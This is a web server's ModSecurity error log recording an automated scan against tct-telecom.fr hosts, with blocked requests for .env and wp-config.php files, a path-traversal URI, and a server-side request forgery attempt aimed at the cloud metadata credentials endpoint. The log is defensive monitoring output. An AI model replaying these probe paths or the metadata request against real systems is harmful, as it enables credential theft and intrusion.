[Mon May 11 15:23:20.981226 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:46710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSKO9RdIr1DwxYR2THgAAANM"]
[Mon May 11 15:23:21.091250 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.115977 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.140799 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.576940 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.608095 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.637799 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.662456 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.692048 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.719749 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:21.745574 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.201399 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.230385 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.248810 2026] [security2:error] [pid 1319885:tid 1319932] [client 195.178.110.133:3040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRFchVQ3tCn0m9OpZNwAAARY"]
[Mon May 11 15:23:22.260269 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.261437 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMAAAABA"]
[Mon May 11 15:23:22.261606 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMAAAABA"]
[Mon May 11 15:23:22.261801 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMAAAABA"]
[Mon May 11 15:23:22.268275 2026] [core:error] [pid 1319953:tid 1319975] [client 195.178.110.133:46876] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:22.280662 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMgAAABA"]
[Mon May 11 15:23:22.280860 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMgAAABA"]
[Mon May 11 15:23:22.281073 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZMgAAABA"]
[Mon May 11 15:23:22.285968 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.305859 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZNgAAABA"]
[Mon May 11 15:23:22.306060 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZNgAAABA"]
[Mon May 11 15:23:22.306272 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZNgAAABA"]
[Mon May 11 15:23:22.314653 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.327508 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZOgAAABA"]
[Mon May 11 15:23:22.327700 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZOgAAABA"]
[Mon May 11 15:23:22.327890 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYSqy-5-wpj6Sx56aZOgAAABA"]
[Mon May 11 15:23:22.346195 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.370812 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.384623 2026] [security2:error] [pid 1319998:tid 1320006] [client 195.178.110.133:3430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRKt2WtvoFr7xvGzUigAAAIY"]
[Mon May 11 15:23:22.397518 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:22.425671 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.056422 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.082777 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.109531 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.176178 2026] [security2:error] [pid 1319886:tid 1319906] [client 195.178.110.133:3054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRKy-5-wpj6Sx56aYxQAAAAU"]
[Mon May 11 15:23:23.191122 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnAAAARE"]
[Mon May 11 15:23:23.191267 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnAAAARE"]
[Mon May 11 15:23:23.191527 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnAAAARE"]
[Mon May 11 15:23:23.192845 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNXgAAAFg"]
[Mon May 11 15:23:23.192976 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNXgAAAFg"]
[Mon May 11 15:23:23.193180 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNXgAAAFg"]
[Mon May 11 15:23:23.195813 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS6y-5-wpj6Sx56aZSQAAAA0"]
[Mon May 11 15:23:23.195951 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TOgAAAMg"]
[Mon May 11 15:23:23.196093 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TOgAAAMg"]
[Mon May 11 15:23:23.196303 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TOgAAAMg"]
[Mon May 11 15:23:23.196492 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS6y-5-wpj6Sx56aZSQAAAA0"]
[Mon May 11 15:23:23.196689 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS6y-5-wpj6Sx56aZSQAAAA0"]
[Mon May 11 15:23:23.197763 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnQAAAQM"]
[Mon May 11 15:23:23.197888 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnQAAAQM"]
[Mon May 11 15:23:23.198096 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYS1chVQ3tCn0m9OpZnQAAAQM"]
[Mon May 11 15:23:23.198133 2026] [security2:error] [pid 1320398:tid 1320416] [client 195.178.110.133:47200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYS-JEyNRN152ArOSNXwAAAFA"]
[Mon May 11 15:23:23.198280 2026] [security2:error] [pid 1320398:tid 1320416] [client 195.178.110.133:47200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYS-JEyNRN152ArOSNXwAAAFA"]
[Mon May 11 15:23:23.198493 2026] [security2:error] [pid 1320398:tid 1320416] [client 195.178.110.133:47200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYS-JEyNRN152ArOSNXwAAAFA"]
[Mon May 11 15:23:23.199308 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.201492 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYS6t2WtvoFr7xvGzVTgAAAIQ"]
